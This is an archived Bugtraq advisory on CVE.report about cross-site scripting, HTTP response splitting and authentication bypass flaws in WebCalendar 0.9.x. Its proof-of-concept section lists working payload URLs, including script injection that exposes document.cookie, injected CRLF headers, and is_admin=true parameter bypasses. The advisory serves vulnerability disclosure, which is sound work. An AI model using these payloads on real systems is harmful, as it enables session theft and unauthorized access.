WebCalendar Multiple Remote Vulnerabilities

BID:11651

Info

WebCalendar Multiple Remote Vulnerabilities

Bugtraq ID: 11651
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: Nov 10 2004 12:00AM
Updated: Nov 10 2004 12:00AM
Credit: Joxean Koret <[email protected]> disclosed these vulnerabilities.
Vulnerable: WebCalendar WebCalendar 0.9.44
WebCalendar WebCalendar 0.9.41
WebCalendar WebCalendar 0.9.40
WebCalendar WebCalendar 0.9.37
WebCalendar WebCalendar 0.9.34
WebCalendar WebCalendar 0.9.32
WebCalendar WebCalendar 0.9.31
WebCalendar WebCalendar 0.9.29
WebCalendar WebCalendar 0.9.27
WebCalendar WebCalendar 0.9.20
WebCalendar WebCalendar 0.9.19
WebCalendar WebCalendar 0.9.8
k5n WebCalendar 0.9.43
k5n WebCalendar 0.9.42
k5n WebCalendar 0.9.39
k5n WebCalendar 0.9.38
k5n WebCalendar 0.9.36
k5n WebCalendar 0.9.35
k5n WebCalendar 0.9.33
k5n WebCalendar 0.9.30
k5n WebCalendar 0.9.28
k5n WebCalendar 0.9.26
k5n WebCalendar 0.9.25
k5n WebCalendar 0.9.24
k5n WebCalendar 0.9.23
k5n WebCalendar 0.9.22
k5n WebCalendar 0.9.21
k5n WebCalendar 0.9.16
k5n WebCalendar 0.9.15
k5n WebCalendar 0.9.11
Not Vulnerable:

Discussion

WebCalendar Multiple Remote Vulnerabilities

Multiple remote vulnerabilities are reported to exist in WebCalendar.

Multiple cross-site scripting vulnerabilites, an HTTP response splitting vulnerability, and two authentication bypass vulnerabilities are reported to exist in many different scripts in the affected application.

Fixes are reported to exist in the CVS version of the software.

Exploit / POC

WebCalendar Multiple Remote Vulnerabilities

Examples have been provided for these issues.

Examples for cross-site scripting vulnerabilities:
http://www.example.com/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
http://www.example.com/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
http://www.example.com/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
http://www.example.com/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
http://www.example.com/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
http://www.example.com/includes/styles.php?FONTS=asdf}%0A--></style>&lt;script&gt;alert(document.cookie)&lt;/script&gt;

Example for the HTTP response splitting vulnerability:
http://www.example.com/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi to all

Examples for the authentication bypass vulnerabilities:
http://www.example.com/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
http://www.example.com/upcoming.php?public_must_be_enabled=true&public_access=Y

Solution / Fix

WebCalendar Multiple Remote Vulnerabilities

Solution:
It is reported that some, or all of these issues have been corrected in the CVS versions of the package. This has not been confirmed.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

WebCalendar Multiple Remote Vulnerabilities

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report